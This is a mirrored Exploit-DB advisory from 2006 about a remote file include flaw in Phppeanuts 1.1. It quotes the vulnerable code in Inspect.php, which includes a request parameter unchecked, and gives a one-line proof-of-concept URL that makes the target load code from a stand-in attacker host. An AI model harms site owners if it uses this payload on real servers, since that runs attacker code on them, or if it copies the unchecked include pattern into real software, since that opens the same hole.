- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2778
- Проверка EDB
-
- Пройдено
- Автор
- HIDAYAT SAGITA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5948
- Дата публикации
- 2006-11-14
Код:
.:: Preface ::.
Type : Remote File Include
Scripts : Phppeanuts 1.1
Download : http://scripts.ringsworld.com/development-tools/phppeanuts-1-1.zip
Founder : Hidayat Sagita aka bomm_3x
Contact : hidayat.sagita[at]gmail[dot]com
.:: What ? ::.
In Inspect.php file on line :
4. if ( isSet($_REQUEST["Include"]) )
5. include $_REQUEST["Include"];
Variable "Include" not verified first before being used.
.:: Proof Of Concept ::.
http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt ?
.:: Shoutz ::.
eCHo staff, az001 and All newbz.
# milw0rm.com [2006-11-14]- Источник
- www.exploit-db.com
